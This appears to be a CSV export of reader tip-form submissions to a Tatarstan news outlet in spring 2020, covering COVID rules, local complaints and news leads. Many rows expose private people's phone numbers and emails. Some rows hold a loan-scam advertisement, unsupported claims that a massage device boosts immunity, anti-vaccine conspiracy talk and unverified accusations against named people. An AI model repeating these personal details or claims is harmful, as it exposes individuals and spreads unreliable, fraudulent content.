"id","name","phone","email","title","message","files","public_time","user_id","token","host"
1,жека,"9172578283",Bitunov.Evgeniy@yandex.ru,"",в стране бардак и хаос. власть самоустранилась. баблом-то никто не хочет делится!!!!!!!!,"38b76dcd9d71ee069a02b351d4e56f48","2020-04-22 16:19:43",0,"38b76dcd9d71ee069a02b351d4e56f48",2956199020
2,Сергей,"89125675645",severinh@yandex.ru,Поздравте вахтовиков с праздником ,"► В преддверии праздника ""ДНЯ ВАХТОВИКА"" ознакомьтесь с музыкальным проектом авторской песни Иванова Андрея Михайловича (Сургут)

►Андрей Михайлович вахтовик с ""Сургутнефтегаз"" СУБР-1 и в этой песни
поздравляет всех коллег-вахтовиков России с наступающим торжеством.

https://youtu.be/yVfofGmFmyY",b15ee6199ac93ea0cecc3af41a9617d0,"2020-04-22 18:10:20",0,b15ee6199ac93ea0cecc3af41a9617d0,1522397852
3,Руслан,"89376221780",Bavly-es@yandex.ru,Девочек из Чебоксар бросили в Бавлах ,Сегодня в 6 утра в Бавлах в полицию доставлены 3 девочки 5.-6 лет. Сказали что их привезли с Чебоксар. Оставили у деда.  Дед их обидел и они убежали. Несли с собой сумки и коробки  с вещами .,"","2020-04-22 19:33:52",0,d601151623d6112dcd69e80484639e8d,2999778351
4,"","","",Ленина забыть не просто... ," Вчера  исполнилось 150 лет со дня рождения В.И.Ульянова(Ленина).

Как ни крути, но с его именем связано немало - и в жизни нашей страны, и в жизни многих из нас. Взять хотя бы меня. В далеком детстве я носил на груди октябрятский значок с изображением маленького и кудрявенького Вовочки Ульянова. В юности я был членом организации имени Владимира Ильича, которая называлась ленинский комсомол. После армии я поступил в университет, носящий имя Володи Ульянова, участвовавшего в революционной студенческой сходке 1887 года. Я несколько раз был на праздничных демонстрациях, проходя по площади Свободы мимо памятника Владимиру Ильичу... Так что получается, я с этим именем связан большую часть своей жизни. И хотя сегодня вся огромная пропагандистская машина власти нацелена на то, чтобы выкорчевать это имя из умов бывшего советского, а ныне российского народа, многие , как и я, все равно помнят и Ленина, и страну, в которой родились. И это, по-моему, нормально.","","2020-04-23 14:30:51",3127,b83874d749c0155bf43ff2b2dd57c7bb,1588896998
5,"","","","",рп,"","2020-04-23 19:11:03",0,"48ee37903aadaeb7d804ef5d0cf81238",1411905393
6,"","","","",назначен новый начальник УЭБ и ПК,"","2020-04-24 11:53:36",0,"890c95d55c974239429de624c4b8f6c4",2449467638
7,"","","","",Председатель правления «Тинькофф банка» Оливер Хьюз направил заммэра Москвы по вопросам социального развития Анастасии Раковой письмо с предложением помочь в борьбе с коронавирусом. «Ведомости» ознакомились с копией документа; письмо датировано 24 марта. Представитель «Тинькофф банка» подтвердил отправку такого письма.,"","2020-04-24 21:47:18",0,b41fe21fe8b0a374bd3b767f8c28a72f,95698508
8,петр,"","",вотнем гвоздь в глазьева,когда же созидать?,"","2020-04-25 01:48:34",0,"40cc0218dfedcaf92df5c191da7904c4",2956691375
9,Марат,"8-953-496-4847",merik116@yandex.ru,О чем это ?,"Да, все и о том, чтобы уводить мировую историю подальше, в другую степь.
Термин, государство Золотая Орда появляется в 1944 г. И этим термином зачеркивают первое в мире глобальное государство, от берега до берега трёх мировых океанов вышедшее за рамки империи.
Строит это глобальное государство старший сын Чингисхана - Султан Салах-ад - Дин Мухаммад (в совковых источниках Джучи) обьединив  Арабский халифат и империю Чингисхана в единое глобальное государство, колонизируя Индию, Малайзию и Индонезию, для чего использует флот Арабского халифата и его мореплавателей.
Уже, его сын - Султан Бадриддин Мухаммад (в совковых источниках Батый хан) колонизирует самую нецивилизованную часть планеты - Восточную Европу и Азию до берегов Арктического океана (в совковых источниках Северный ледовитый) и строительство глобального государства от берега до берега четырех мировых океанов завершено.","","2020-04-25 17:24:47",0,eed69b6e96cc9094e94839f6ff840c6d,1467332954
10,Геннадий,"89658282324",gennadiykopytov@yandex.ru,Александр Лебедев,"Наша идея — культурная конкуренция, смысловая, изменение через питание, если хотите, кармического кода с саморазрушения на здоровое питание, с линейкой продуктов своего производства. Без глютена, без сахара. Хлеб из гречки, в маленьких городах, где такое кафе, как театр или центр культуры, — помните, раньше большевики строили клубы в деревнях? Смысл идеи был такой, чтобы создать противовес «Макдоналдсу».
Подробнее на РБК:
https://www.rbc.ru/business/06/07/2015/559935b29a7947c4237ebb13

Возьмите интервью у Александра Лебедева: что он сумел сделать и что будет делать в ближайшем будущем.","","2020-04-25 18:53:07",0,"60ac6143b536916ba628beec45ae67a6",633600282
11,"","","","",а и не пошли  бы все анонимщики,"","2020-04-25 23:25:42",0,"3a4149d1129f17692abb77f3e132d486",2956227288
12,"","","","","Можете осветить вопрос о чистке ФСБ?
Правда ли, что когда Путин говорил,что чистки ФСБ не будет, он имел в виду только сухую чистку, а мокрая типа стирка, душ,умывание. баня ФСБ будет обязательно.
Верно же изречение,что у России только два союзника: Армия и Флот, а ФСБ это лишь опасное оружие, которое надо постоянно чистить даже если не очень хочется, тем более когда предыдущие чистки пропущены?","","2020-04-27 05:36:45",0,"29b81af9552f3b6938782e62162e8c66",787614429
13,"Гостиница ""Регина""","",takpo-urist@mail.ru,"Решением Верховного суда Республики Татарстан отменено Постановление Лаишевского районного суда РТ о приостановлении деятельности гостиницы ""Регина"" на срок тридцать суток.","       04 апреля 2020 г. в БИЗНЕС Online была размещена новость ""Судебные приставы опечатали гостиницу ""Регина"" в поселке Петровском.
       Постановление Лаишевского районного суда Республики Татарстан от 03 апреля 2020 г., на основании которого ИП Скоблионок Регина Михайловна была признана виновной по ч. 2 ст. 6.3. КоАП РФ и было назначено наказание в виде административного приостановления деятельности гостиницы ""Регина"" на срок тридцать суток, было обжаловано в Верховном суде Республики Татарстан.
       Решением Верховного суда Республики Татарстан от 21 апреля 2020 г. жалоба Индивидуального предпринимателя Скоблионок Регины Михайловны удовлетворена.
       Постановление судьи Лаишевского районного суда Республики Татарстан от 03 апреля 2020 г., вынесенное в отношении ИП Скоблионок Регины Михайловны по делу об административном правонарушении, предусмотренном частью 2 статьи 6.3 КоАП РФ отменено, производство по делу прекращено в связи с отсутствием состава административного правонарушения.   

","30d6cd0e74e242a7635b907b9ae9ccc5","2020-04-28 11:06:28",0,"30d6cd0e74e242a7635b907b9ae9ccc5",1467331162
14,Лилия,"89172291900",iliazova.lil@gmail.com,Садоводы,"Здравствуйте, уважаемый БО!
Сегодня Путин объявил, что ""самоизоляция"" продлевается до 11 мая, а главы регионов по прежнему могут принимать решения по своим регионам. 
Я хотела бы Вас попросить выяснить, планируют ли наши Татарстанские власти какие-то послабления карантина для садоводов? Майские праздники на носу, столько выходных и всего 2 поездки в неделю. Очень хорошо сделали В Петербурге - ездить можно, но нужно иметь с собой документы на участок. Возможно, и у нас что-то подобное введут?

Заранее благодарю!","","2020-04-28 18:56:08",0,"1c00383ab35d4196d2b2e7ece6ecaa1b",1533764419
15,Станислав,+79179086100,ivlstanislav@yandex.ru,Жители Иркутской области поймали орг.группу высокопоставленных чиновников при поджоге леса,http://www.ust-kut24.ru/?p=72454,"","2020-04-28 22:19:45",0,"0b0a70d2069f6538305eb3d589d0a1a3",90510294
16,"","","","",нас руководители заставляют выходить на субботники,"","2020-04-29 13:03:37",0,f8faccc64e14fdabb91ab6295108ae16,2999924665
17,Ильдар,"9872973432",ildbak@yandex.ru,Деньги против прав инвалидов.,"Вам невыгодно иметь свободными места для инвалидов ибо они не приносят Вам ДОХОД.
Если на месте инвалида стоит авто хама и нахала, то Вам в казну капнет доход. Все понятно- Деньги решают все в нашей","","2020-04-29 19:27:10",2128,"557e5be583f7d0abfb7ca0987420a611",2999792773
18,Эмиль,+79257862777,emil.aysin@megadrive.ru,Подлые методы работы на КАМАЗе,"Доброе утро, уважаемые издатели!

Как вам наверняка известно, на КАМАЗе в продажах новые руководители. С этого года назначили Шамсутдинова Р.Д. на должность ЗГД ПАО «КАМАЗ» по продажам и сервису и Гендиректором АО «ТФК «КАМАЗ», а также Леонова Д.В. в роли Исполнительного директора АО «ТФК «КАМАЗ». 

Как эти уважаемые парни пришли, на КАМАЗе началась ситуация похожая на фашистскую германию – всех подозревают, с дилерами обращаются как со скотиной, ощущение складывается такое, что люди намеренно хотят остановить конвейер. 

Подскажите, вам интересно опубликовать статью о том, что происходит внутри?

Спасибо.

","","2020-04-30 09:03:24",0,a9c28b8cd029ee13e10ea8654307840b,1540556432
19,"","","","","Верховный суд России в своем свежем обзоре судебной практики прояснил обстоятельства, при которых человека можно привлечь к уголовной ответственности за распространение ложной информации. Принципиальный момент: человек должен осознавать, что размещает фейк. При этом под статью попадает в том числе рассылка ложной информации через мессенджеры: WhatsApp, Viber и другие.
https://rg.ru/2020/04/30/vs-obiasnil-kogda-mozhet-nastupat-ugolovnaia-otvetstvennost-za-fejki.html","","2020-04-30 12:57:11",0,e3bb508e4b2998f887108623accbc31c,3483033352
20,Людмила Борисовна,+79374309156,pany666@rambler.ru,Бесплатное лечение зуба,"Здравствуйте! Хочу поделиться своим опытом бесплатного лечения зуба. И другие люди последовали моему совету. Фотографируйте зуб на стадии лечения и окончания лечения.
     Мне удалила нерв из зубного канала, заложила вату в канал и направила делать ренгенснимок зуба(мне надо было сделать фото, а лучше видео с объяснением данного случая). Потому, что мне потом запломбировала зубной канал тяп-ляп,  да так, что я на следующий день от нестерпимой боли выла и это продолжалось семь дней, глотая обезболивающее каждые 7-8 часов, ушло три упаковки, что отразилось на желудке.
     И вот тут тоже надо было сделать фото зуба, где видно зуб и пломба белые!!! 
     Зуб и сейчас побаливает, правда не так сильно, потому, что по истечении некоторого времени ЗУБ ПОТЕМНЕЛ.
     Было бы здорово, чтобы это прочитало много людей и обезопасили себя от таких стоматологов! И им помогли бы эти снимки доказать некачественное лечение зуба.
  
","","2020-05-01 10:44:54",0,"6131ce5f0c6f92554b7efed8b00daf74",1588968639
21,"","","","",https://www.bbc.com/russian/features-52493422,"","2020-05-01 14:57:20",0,b3e65c198a4991cc409e2cd0a5de47c3,1588911294
22,Александр Комаров,+7-8555-400-770,komarovsasha1989@mail.ru,На НКНХ хотят ввести 4-хдневку,https://www.instagram.com/tv/B_pvmB_JByn,"","2020-05-01 23:48:05",0,"8187c422427320d15cc0a5d3d636f870",3322956828
23,Андрей Белов,"89047619394",istorik1978@mail.ru,"К 9 мая татарстанцы спели, записали песню Журавли и смонтировали клип","Добрый день. В связи с экономическим кризисом, пандемией мы стали забывать о Великом Празднике-75-летии Победы в Великой Отечественной войне. 
Как-то спонтанно родилась идея записать с коллегами(5 казанцев и 2 набережночелнинца) песню на 9 мая, ещё в начале марта.... Выбрали песню на стихи Расула Гамзатова Журавли. Решили спеть в студии звукозаписи, для погружения взяли форму военную времен войны у знакомых реконструкторов, спели, сняли фото, видео. Когда монтировали клип собрали фотографии своих родственников воевавших, не вернувшихся, начали искать по архивам информацию.... По одному прадеду нашли дату призыва и дату гибели, по другому-фото похоронки...Чтобы Помнили... Мы Помним! 
Ссылка на клип https://yadi.sk/i/pF18-QPGK2dPQQ
",bb28b6d1f2f30292909b1084ea85f88e,"2020-05-03 08:54:24",0,bb28b6d1f2f30292909b1084ea85f88e,1410491184
24,"","","",Актулаьно протрарковки,http://www.evening-kazan.ru/articles/platit-za-parkovku-tak-zhe-normalno-kak-za-benzin-kazancev-hotyat-otuchit-ot-durnoy-privychki-stavit-avtomobili-vo,"","2020-05-03 20:49:55",0,"7d4cacb1bf1510d1fbb9534329eebe58",1805016844
25,"","","","",wwwwwwwwwwwwwwwwwwwwwwwww,"","2020-05-04 05:39:55",0,a49e802bf8d55b316d47693bdb2668e7,1231295449
26,сергеева наталья,"89270392318",ceragem_kazan@mail.ru,"Обратный иммунитет""... что мы знаем об этом? ","В 2019 году на III международном медицинском форуме ""Invest in health"", проходившем в Казани, было заключено Соглашение ГЧП с южно-корейской компанией Сераджем, известной в мире своими инновационными технологиями в области здоровья. 
В рамках Соглашения, в разных городах нашей республики компания предполагала открыть свыше 15 Оздоровительных Центров, оснащенных своими уникальными медицинскими аппаратами. К сожалению, по неизвестным причинам помещения для этих Центров выделены не были. Никому, видимо, не нужно было оздоравливать, тем более бесплатно, жителей Татарстана. 
Сегодня весь мир озабочен поиском информации, как поддерживать свой иммунитет во время распространения новой инфекции. В последнее время большое внимание уделяется 
управлению иммунитетом с помощью так называемого «обратного иммунитета»,
т.е. посредством ухода за позвоночником. В области позвоночника располагаются спинномозговые нервы
автономной нервной системы, которая координирует функции внутренних органов и частей
тела - сердца, матки, желудка, кровеносных сосудов и т. д. Чтобы нормально работали
органы кровообращения, дыхания, пищеварения, выведения и другие системы, очень важна
нормальная работа автономной нервной системы.
Эксперты-иммунологи подчеркивают важность позвоночника, выполняющего для
спинного мозга защитную функцию, и объясняют это тем, что все импульсы головного
мозга передаются организму через спинной мозг, расположенный в стволе позвоночника.
По мнению специалистов, для укрепления иммунитета и поддержания здоровья человека
важен уход за позвоночником, обеспечение здоровья позвоночника, гибкости мышц спины
и т.д. 
Компания Сераджем выявила, что «термомассаж на медицинском аппарате по уходу
за здоровьем позвоночника Сераджем способствует не только облегчению боли, но и активизации функций иммунных клеток, имеет ряд других положительных эффектов, повышающих иммунитет человека». Научная работа с данными результатами получила высшую награду Международной научной конференции ICCT-2019 и награду за лучшую научную разработку и премию международной научной конференции ICSMB-2020.
Для разработки собственных технологий и конкурентоспособной продукции в компании Ceragem функционируют корпоративные НИИ технологий и НИИ медицинских наук. НИИ технологий Ceragem имеет квалификацию WTDP аккредитованного института тестирования UL, а в НИИ медицинских наук Ceragem трудятся врачи и профессора из разных медицинских вузов и учреждений, которые занимаются клиническими испытаниями и разработками продукции Сераджем. 
Публикации в СМИ вызвали пик популярности техники Сераджем в Южной Корее этой весной. Многие наши соотечественники пользуются этой продукцией, ведь компания в России представлена уже 15 лет, ее аппараты занесены в ""Перечень важнейшей и жизненно необходимой медицинской техники"", освобождены от уплаты налогов. Но скорее всего они  и не подозревали о таком ее эффекте. 
Все новости о компании читайте на сайте www.ceragem.ru
https://ceragem.ru/holding/novosti/novosti-seradzhem-v-rossii/novosti-rossii_30.html
Авторское право © «Деловая Корея». https://cp.news.search.daum.net/p/89309798 ,
Ссылки на статьи из южнокорейских источников о научной работе, представленной на
международной научной конференции ICSMB-2020:
https://www.ceragem.co.kr/m/pr/notice-view.asp?seq=17,
https://www.dailysecu.com/news/articleView.html?idxno=62979. ",df72b2d517f91a3d87f6a68779677bf2,"2020-05-04 17:48:00",0,df72b2d517f91a3d87f6a68779677bf2,2956681317
27,сергеева наталья,"89270392318",ceragem_kazan@mail.ru,"Обратный иммунитет""... что мы знаем об этом? ","В 2019 году на III международном медицинском форуме ""Invest in health"", проходившем в Казани, было заключено Соглашение ГЧП с южно-корейской компанией Сераджем, известной в мире своими инновационными технологиями в области здоровья. 
В рамках Соглашения, в разных городах нашей республики компания предполагала открыть свыше 15 Оздоровительных Центров, оснащенных своими уникальными медицинскими аппаратами. К сожалению, по неизвестным причинам помещения для этих Центров выделены не были. Никому, видимо, не нужно было оздоравливать, тем более бесплатно, жителей Татарстана. 
Сегодня весь мир озабочен поиском информации, как поддерживать свой иммунитет во время распространения новой инфекции. В последнее время большое внимание уделяется 
управлению иммунитетом с помощью так называемого «обратного иммунитета»,
т.е. посредством ухода за позвоночником. В области позвоночника располагаются спинномозговые нервы
автономной нервной системы, которая координирует функции внутренних органов и частей
тела - сердца, матки, желудка, кровеносных сосудов и т. д. Чтобы нормально работали
органы кровообращения, дыхания, пищеварения, выведения и другие системы, очень важна
нормальная работа автономной нервной системы.
Эксперты-иммунологи подчеркивают важность позвоночника, выполняющего для
спинного мозга защитную функцию, и объясняют это тем, что все импульсы головного
мозга передаются организму через спинной мозг, расположенный в стволе позвоночника.
По мнению специалистов, для укрепления иммунитета и поддержания здоровья человека
важен уход за позвоночником, обеспечение здоровья позвоночника, гибкости мышц спины
и т.д. 
Компания Сераджем выявила, что «термомассаж на медицинском аппарате по уходу
за здоровьем позвоночника Сераджем способствует не только облегчению боли, но и активизации функций иммунных клеток, имеет ряд других положительных эффектов, повышающих иммунитет человека». Научная работа с данными результатами получила высшую награду Международной научной конференции ICCT-2019 и награду за лучшую научную разработку и премию международной научной конференции ICSMB-2020.
Для разработки собственных технологий и конкурентоспособной продукции в компании Ceragem функционируют корпоративные НИИ технологий и НИИ медицинских наук. НИИ технологий Ceragem имеет квалификацию WTDP аккредитованного института тестирования UL, а в НИИ медицинских наук Ceragem трудятся врачи и профессора из разных медицинских вузов и учреждений, которые занимаются клиническими испытаниями и разработками продукции Сераджем. 
Публикации в СМИ вызвали пик популярности техники Сераджем в Южной Корее этой весной. Многие наши соотечественники пользуются этой продукцией, ведь компания в России представлена уже 15 лет, ее аппараты занесены в ""Перечень важнейшей и жизненно необходимой медицинской техники"", освобождены от уплаты налогов. Но скорее всего они  и не подозревали о таком ее эффекте. 
Все новости о компании читайте на сайте www.ceragem.ru
https://ceragem.ru/holding/novosti/novosti-seradzhem-v-rossii/novosti-rossii_30.html
Авторское право © «Деловая Корея». https://cp.news.search.daum.net/p/89309798 ,
Ссылки на статьи из южнокорейских источников о научной работе, представленной на
международной научной конференции ICSMB-2020:
https://www.ceragem.co.kr/m/pr/notice-view.asp?seq=17,
https://www.dailysecu.com/news/articleView.html?idxno=62979. ",df72b2d517f91a3d87f6a68779677bf2,"2020-05-04 17:49:28",0,df72b2d517f91a3d87f6a68779677bf2,2956681317
28,"","","",Новый макбук,https://www.apple.com/ru/macbook-pro-13/,"","2020-05-04 21:18:15",0,b41fe21fe8b0a374bd3b767f8c28a72f,2556011412
29,PHCCQ9P98 www.yandex.ru,PHCCQ9P98 www.yandex.ru,ShilovaDomna83@list.ru,PHCCQ9P98 www.yandex.ru,PHCCQ9P98 www.yandex.ru,"","2020-05-05 11:04:54",0,"242acb2d0f7842639a75a07d2d0fe165",3165277229
30,СЭМ,"",sarmansp@inbox.ru,Умер РИК,умер РИК сармановского муниципального района.,"","2020-05-07 15:30:11",0,ff8b32e9bada95de9b1e69fe6f7b7f9d,3164783590
31,Татьяна,"",Tatiana.Petrova@A1-Team.ru,Статья_Как эффективно запустить национальную промокампанию в условиях изменившейся реальности?,"Здравствуйте,
 
Меня зовут Татьяна, я PR-менеджер маркетингового агентства A1 Team. 
Мы с командой написали подробную статью но том, какие механики и тренды будут актуальны для промокампаний в посткризисную эпоху. Возможно, вашим читателям материал будет полезен, т. к. во время и после пандемии люди будут жить в режиме жёсткой экономии средств и обращать пристальное внимание на ценники и промоакции.
 
Подскажите, пожалуйста, возможно, вам подойдёт наш материал для публикации? При необходимости можем внести правки.
 
Заранее большое вам спасибо за ответ! 
 ",ca0cad2768028bdbcb1a653d86b32bb9,"2020-05-07 16:00:46",0,ca0cad2768028bdbcb1a653d86b32bb9,2965443264
32,Юлия,"",yuliya_gertsman@gmail.com,Есть продолжение вашей новости о краже павильона в 30-м комплексе Челнов. Проверьте пожалуйста,"По новости о украденном павильоне в Челнах в 30-м комплексе есть точная информация что она демонтирована легально. Смотрите сайт госуслуг ""Народный Контроль"" здесь:  https://uslugi.tatarstan.ru/open-gov/detail/3387401","","2020-05-07 22:07:12",0,"7be0227e352fe1e417d0d0fa063fd2cf",1508816652
33,Ольга,"2721492","",УК 21 век в разгар эпидемии устроили уличный праздник,во дворе дома по ул.Курской 20 с утра громко играет музыка и всех приглашают попеть караоке))))))))))))) звук ужасный и очень громкий. дома невозможно находится,"","2020-05-08 13:41:46",0,"163706fce7a1a58bbb2ef0706ab37ade",1604435124
34,"","","",--,"Московский район - раскидывают такие  ""визитки"" по домам",af66c86b0ff425973c1037c325d2f889,"2020-05-08 14:20:28",0,af66c86b0ff425973c1037c325d2f889,2999747454
35,Дмитрий,"",dmitry@thedmitry.com,"","Интересно, это так спрос вырос во время коронавируса или ""так, на всякий""?
Это в аптеке на Фучика","5e24006986e8a7234f32025bcb0dff4c","2020-05-08 15:51:57",0,"5e24006986e8a7234f32025bcb0dff4c",2999803540
36,Дмитрий,"",dmitry@thedmitry.com,"","Интересно, это так спрос вырос во время коронавируса или ""так, на всякий""?
Это в аптеке на Фучика","5e24006986e8a7234f32025bcb0dff4c","2020-05-08 15:52:20",0,"5e24006986e8a7234f32025bcb0dff4c",2999803540
37,"","","","",https://www.minobrnauki.gov.ru/common/upload/library/2020/05/prikaz_648.pdf,"","2020-05-08 21:20:06",0,b3e65c198a4991cc409e2cd0a5de47c3,1588911294
38,credit union,starlikcreditunion@usa.com,starlinkcreditunion@usa.cpm,"","
Добрый день всем, я мистер Фрэнк Мосс, частный кредитор, который
дает возможность пожизненных кредитов для погашения ваших личных счетов и долгов
и начать свой собственный бизнес с частными компаниями и частными лицами на
ставка 3%. Поэтому свяжитесь с нами сегодня по электронной почте: starlinkcreditunion@usa.com

Форма заявки на кредит:

Имя:
Пол:
Страна:
Условие:
Адрес:
Телефонный номер:
Род занятий:
Необходимая сумма:
Срок кредитования:
Вы обращались раньше?

E-mail: процентная ставка 3% в год.
Электронная почта: starlinkcreditunion@usa.com
WhatsApp: + 209-435-8283
","","2020-05-09 07:24:18",0,e6cb845eb99cc238e63fa0275422932c,1299183575
39,Рушан,"89856976426","",дни рождения,"у руководителя Центра поддержки экспорта РТ, Марата Иршатовича сегодня день рождения","","2020-05-09 08:39:33",0,"98dda24a8cf78092c1422483c8f7c849",1467333051
40,"","","",Коронавирус на КАПО,"В одном из цехов КАПО обнаружили коранавирус. Весь цех отправили на карантин. Но цеха между собой в силу производственной необходимости тесно общаются. 
На заводе только замер температуры на проходной и жидкость на руки.
Во всем остальном все тоже самое.
Самый большой завод в Казани уже заражен.
Что ждет город,","","2020-05-09 21:41:04",0,"42fd42e220f37d883a8459393bbe99f5",3644985644
41,"","","","","безграмотный, невежа, самоуверенный, самодовольный, ещё один ВОР!","","2020-05-10 21:06:37",0,"5c37e6607f6696c250499e339c6a02ff",1588914790
42,"","","","",Самозанятые получат уплаченные ранее налоги. Ведомости ,"","2020-05-11 18:24:59",0,"7d4cacb1bf1510d1fbb9534329eebe58",755628387
43,Ольга,"003","",одноразовые перчатки есть далеко не во всех аптеках. нашла в 3-х из 7-ми. ,цены от 15 руб за S размер до 48 руб? почему этот вопрос не поднимаете? Это же ОДНОРАЗОВЫЕ ПЕРЧАТКИ))),"","2020-05-12 12:15:39",0,e437966f2408ddaa5ef31c5ea2936eaf,1410490908
44,"","","",Просьба осветить проблему в казанским паркином,"Утром 12 мая на официальной странице паркинга была информация о том что он бесплатен до 18 мая, потом сообщение поменяли указав что плата будет взыматься уже с 13 мая и в 11 часов еще раз поменяли указав что с 12 мая, то есть с сегодняшнего дня. Таким образом по сути все кто поставил машины на парковку утром 12 мая обязаны оплатить паркинг из-за дезинформации официальной страницы паркинга. Также прошу обратить внимание что новость на портале kzn.ru появилась только в 11 часов, что опять же говорит о введении платы по сути задним числом. Спасибо за ваше внимание.",e77b5f4c34fae3e0a0537ef4e06f1eb3,"2020-05-12 12:57:11",0,e77b5f4c34fae3e0a0537ef4e06f1eb3,85407556
45,Илья,"89503255269",berilyatat@gmail.com,Замор рыбы на озере Богородское в Пестречинском районе,У нас на озере Богородское Пестречинского района тоже замор рыбы. Вода изменила цвет на темно-коричневый. Запах появился едкий. Вдоль берега в зарослях мертвые рыбы - фото в приложении. ,e2900fe1d6f2531b587e295562f7c994,"2020-05-12 22:17:41",0,e2900fe1d6f2531b587e295562f7c994,1467334068
46,андрей,"9375714567",andreyy.olegovi@rambler.ru,выплаты сотрудникам скорой помощи города нижнекамска по новой короновирусной инфекции ,"мы сотрудники скорой медицинской помощи города нижнекамска не согласны с выплатами за работу в условиях эпидемии по новой короновирусной инфекции.
в конце марта 2020 года были созданы эвакуационые бригады ,которые на протяжении всего этого времени ездили к потенциальным больным,прибывшим из очагов короновирусной инфекции,брали у них мазки,а в итоге оплату получили за фактическое время прибывания с уже подтвержденным больным covid 19.,что не соотвествует постановлению  правительству РФ №415.","","2020-05-13 23:01:46",90522,bd3b28d0b58558be60fcf9cb7e028788,2956207010
47,"","","","","Открой уши Чучундра!
 Вместо того чтобы осудить и разоблачить доклад-враньё Волюнтариста Никитки ХрюЩева на ХХ съезде КПСеСе в 1956 году, который был как большая и красная пробирка Коли Пауэлла в ООНе. Этот доклад, как и писанина обозника-стукача Шурика СоЛЖЕницина-Ветрова послужили развалу СССР. Их так и будут пинать вовсе приличные и не приличные места за якобы миллионные жертвы И.В.Сталина. Тот же Никита Сергеевич Хрущев, оказавшийся вторым в стране по кровожадности. А первый — Роберт Индрикович Эйхе. Он каждый год выпрашивал у Политбюро разрешение дать ему возможность подписывать смертные приговоры за невыполнение хлебопоставок. Запрашивал не поимённо, а цифирью, огромное количество, десятки тысяч сибиряков: сколько можно ему расстрелять, а сколько — отправить в лагерь. А Хрущёв исхитрился летом 1937 г. найти несколько тысяч кулаков в Подмосковье! Кулаков здесь в помине не было, тем более — в 1937-м, когда коллективизировали уже всё, что можно. Никита Сергеевич находит их. Я догадываюсь, что он понимал под словом «кулак». Когда готовилась Конституция 1936 г., Сталин и Вышинский сделали очень хитрое дело (Вышинский представил в Политбюро, а Сталин добился утверждения): освободили всех крестьян, которых посадили за так называемые «три колоска», — это около миллиона человек. Более того, с них сняли судимость, вернули им право голосовать и быть избранными! И вот «наш дорогой Никита Сергеевич» слишком хорошо понимал, что эти люди за него никогда не проголосуют и его карьера чиновника с четырьмя классами образования (два в церковно-приходской школе и два — на руководящей партийной должности в Промакадемии) кончилась, потому что он ничего не умеет, ничего не знает. И пошли в ход пресловутые ""тройки"", списки намеченных к ликвидации ""врагов народа""- по первой , по второй категориям… Многие из ""ударников"" насилия – Эйхе, Хрущёв, Варейкис, Евдокимов, Постышев требовали от Москвы новых лимитов на внесудебные расправы.
Стукачу уже поставили памятник в Москве на бывшей ул. Большая коммунистическая Шурику   СоЛЖЕНицену-Втрову. Открывал и в ладошки хлопал сам ВВП со вдовой стукача. ","","2020-05-14 09:48:34",0,"238f44a5508ccc9ebc719026889e0eee",780801217
48,Дарина,"89172499948",darina.brendiureva@domru.ru,"«Всегда быть в маске…» там, где необходимо Видеоаналитика определит нарушителей масочного режима","АО «ЭР-Телеком Холдинг» (ТМ «Дом.ru Бизнес») представляет новое «умное» решение - контроль применения санитарно-гигиенических масок. Детектор автоматически определяет, есть ли средство защиты на лице. Сервис становится особенно актуальным в условиях практически повсеместного введения масочного режима в субъектах РФ.
Детектор эффективен в местах скопления людей, на предприятиях, в офисах – везде, где необходимо соблюдать повышенные меры безопасности.
На объекте устанавливают камеру с подключенным модулем видеоаналитики, направленную на входящий поток людей и сканирующую их лица. Обо всех нарушениях масочного режима система сообщает руководителю или ответственному за безопасность сотруднику по email или push-уведомлением. Это позволяет оперативно реагировать на ситуацию. Все зафиксированные события сохраняются в журнале, отчеты представлены в личном кабинете.
«Предприятия и офисы постепенно начинают открываться после длительного карантина, но повышенные меры безопасности никто не отменял. Видеоконтроль наличия маски – очередное «умное» решение холдинга, которое помогает бизнесу соблюдать требования закона и заботиться о здоровья персонала и посетителей», – комментирует Степан Ковалёв, менеджер проекта «Облачное видеонаблюдение» АО «ЭР-Телеком Холдинг» (ТМ «Дом.ru Бизнес»). 
Подробное описание детектора масок и условия подключения – на kaza.b2b.domru.ru или по телефону 8 800 333 9000.
","913ac0810814d0ebdab1eaa160c3809d","2020-05-14 14:05:26",0,"913ac0810814d0ebdab1eaa160c3809d",1841470217
49,credit union,starlikcreditunion@usa.com,starlinkcreditunion@usa.cpm,"","
Добрый день всем, я мистер Фрэнк Мосс, частный кредитор, который
дает возможность пожизненных кредитов для погашения ваших личных счетов и долгов
и начать свой собственный бизнес с частными компаниями и частными лицами на
ставка 3%. Поэтому свяжитесь с нами сегодня по электронной почте: starlinkcreditunion@usa.com

Форма заявки на кредит:

Имя:
Пол:
Страна:
Условие:
Адрес:
Телефонный номер:
Род занятий:
Необходимая сумма:
Срок кредитования:
Вы обращались раньше?

E-mail: процентная ставка 3% в год.
Электронная почта: starlinkcreditunion@usa.com
WhatsApp: + 209-435-8283","","2020-05-15 03:59:38",0,e6cb845eb99cc238e63fa0275422932c,1299183108
50,Андрей ,"9523851705",soyslitseyskygarden@yandex.ru,алхимия беса,"КВ проблему онкологии решает,
Раковые клетки убивает.
КВ жизнь Заворотнюк спасает,
А ВВП внимательно внимает...
Доноров КВ лихо собирает...
Болезнь здоровьем заражает..","","2020-05-16 10:37:26",0,cbc9babdf773e435a8e2de15779a0358,3645021675
51,"","","","","Люди которые прилетают в Москву с других городов ,они что все садяться на карантин?","","2020-05-18 11:34:56",0,d6076206637bea80a8a8b40bb078c19b,1056543270
52,Светлана,"89133828095",psviv-46@mail.ru,Создание роботообразного человека остановить,"Не смогла прочесть до конца, верю. Информационно, системно. Гениальность Ленина в формуле - ""учиться, учиться и учиться; создание нового человека. Это не претворялось в жизнь. наоборот. Элита (подразумевалась?) и так самая учёная и умная. Остальных следовало регулировать и отуплять. Получается, очень эффективно. Цинично, под видом заботы о здоровье -прививки детям. И получаем: ""рост телёнка - разум ребёнка"".  Как же это мощно сейчас форсируется, чтобы все приползли на вакцинацию, не только дети. 
 Мама двух прививочных.","","2020-05-18 18:23:30",0,"64348614137eccf997e779ed8931f671",1388849228
53,Иван,"",sidrom@mail ru,В Татарстане оперативники задержали мирового судью участка № 10 Ново-Савиновского района Казани Айдара Хадиуллина с 80 свертками мефедрона.,https://zona.media/news/2020/05/18/tatarstan,"","2020-05-18 21:02:28",0,"7a0aa7589ce2baf66c65314b02680b1e",2956199208
54,"","","","В Балтасинском районе, в нарушение п.1 ч.17 ст. 65 ВК РФ","в водоохранной зоне реки Шошма (координаты 56.395576, 50.346427) производиться распашка земель.
","","2020-05-19 09:38:14",0,"6ce7b72c22a74a375b9f6be95ed1a495",1435239143
